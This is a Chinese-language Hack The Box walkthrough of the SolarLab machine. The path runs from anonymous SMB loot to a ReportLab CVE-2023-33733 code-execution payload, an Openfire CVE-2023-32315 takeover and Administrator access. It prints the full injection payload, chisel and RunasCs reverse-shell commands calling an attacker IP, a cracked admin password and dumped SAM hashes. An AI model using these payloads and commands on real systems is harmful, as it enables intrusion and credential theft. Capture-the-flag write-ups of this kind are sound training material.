总体思路

SMB获取敏感信息->CVE-2023-33733漏洞注入->CVE-2023-32315->敏感信息泄露

信息收集&端口利用

nmap -sSVC -p1-10000 10.10.11.16

发现目标开放了80、135、139、445和6791端口，并且对应的端口也给出了重定向的标志，将域名加入到hosts文件中以访问

#/etc/hosts
10.10.11.16	solarlab.htb report.solarlab.htb

80端口只有一个在不断跳动的倒计时，对其进行信息收集

发现主网站没有什么能够利用的点，查看report子域名

6791端口是一个ReportHub的界面，但是经过尝试，暴力破解和万能密码对其均不起作用，想到最开始的445端口还没用利用，尝试匿名访问

发现突破点

SMB 匿名访问

smb存在匿名访问，那就继续进入Documents文件夹查看

发现details-file.xlsx和old_leave_request_form.docx文件，经过查看，docx文件没有利用价值，在xlsx文件中有存放账号和密码

于是利用这里面的账号密码去爆破6791端口的登录界面

但是发现全都失败

于是有了一段特别离谱的分析（

首先在xlsx文件中能看到只有三个用户是存在的，分别是Alexander、Claudia、Blake

但是在下方的用户名处，username却发生了变化

A用户结尾多了一个K，C用户结尾多了一个S，从后边邮箱可知，加的字母为其邮箱中.后面的字母，但是B用户邮箱中并没有.，而其用户名中带了.，推测其登录用户为blakeb（以上猜想纯属巧合，实在是没找到QAQ，有知道的可以在评论区说一下，万分感谢！

然后拿着这一段（胡乱猜测逻辑的）密码，能够进入6791端口

搜索该组件可以了解到，该网页是把填入的信息转化成pdf

CVE-2023-33733

搜索reporthub相关漏洞，结果比较少，但是看到了reportlab的漏洞CVE-2023-33733，两者都是将html转化pdf的组件

#POC
<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('SHELL') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font></para>

将poc里的SHELL改为Windows的反弹shell，复制进数据包中travel_request模块下

发送过后即能拿到blake用户的shell

逐个查看当前目录信息

第一个目录就有好消息，有users.db数据库文件，没有用msf不能直接下载，此处先将其转化为base64格式后复制出来，再转化为文本查看

发现了几个用户的密码，应该为6791界面的登录密码，继续查看其他目录，没有发现什么敏感信息，那就查看端口开放情况，看看有没有隐藏端口没有显示

有9090和9091端口，将他们代理到本地

#kali:
chisel server -p 6150 --reverse
#Windows:
./chisel.exe client 10.10.14.43:6150 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

发现是openfire组件，并且版本为4.7.4，在笔者之前发布的Jab靶机中有提到过这个漏洞，这里虽然没有登录凭证，但是存在CVE-2023-32315能够直接新建一个用户

CVE-2023-32315

运行脚本

python3 CVE-2023-32315.py -t http://127.0.0.1:9090

使用得到的用户名和密码登录进界面，在plugins处上传之前拿到过的插件，详见Hack The Box-Jab

然后在Server->Server Settings可以看到上传的插件：shell Plugin

使用密码123登录进管理界面

选择系统命令

输入一段反弹shell，可以得到openfire用户的shell

查看用户可执行的特权

没有可以利用的点，继续进行信息收集，在主目录下看到了embedded-db文件夹，进入查看

逐个查看openfire的文件，在openfire.script文件中找到了一段密文和salt

从描述来看，这一段密码指的就是administrator的凭证

因为该组件为openfire，而openfire又有其单独的加密方式，详见

https://github.com/c0rdis/openfire_decrypt?tab=readme-ov-file

将工具下载到本地编译，并运行

得到administrator的密码为ThisPasswordShouldDo!@，尝试使用evil-winrm登录（过了许久还没登录上）

上传RunasCs，然后再使用administrator的凭证反弹shell

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.43:9200

提权成功

另外，可以使用crackmapexec导出hash值

crackmapexec smb 10.10.11.16 -u administrator -p 'ThisPasswordShouldDo!@' --samSMB         10.10.11.16     445    SOLARLAB         [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\administrator:ThisPasswordShouldDo!@ (Pwn3d!)
SMB         10.10.11.16     445    SOLARLAB         [+] Dumping SAM hashes
SMB         10.10.11.16     445    SOLARLAB         Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c032ae85d6995c0bb4999ec869d90cf:::
SMB         10.10.11.16     445    SOLARLAB         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.16     445    SOLARLAB         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.16     445    SOLARLAB         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:57da9863751e0fd175f042bc41aec9b2:::
SMB         10.10.11.16     445    SOLARLAB         blake:1000:aad3b435b51404eeaad3b435b51404ee:4cf570cdca082077b0e61addac8b7705:::
SMB         10.10.11.16     445    SOLARLAB         openfire:1001:aad3b435b51404eeaad3b435b51404ee:a22c1b83fa00c6030969caf37a5e061b:::
SMB         10.10.11.16     445    SOLARLAB         [+] Added 6 SAM hashes to the database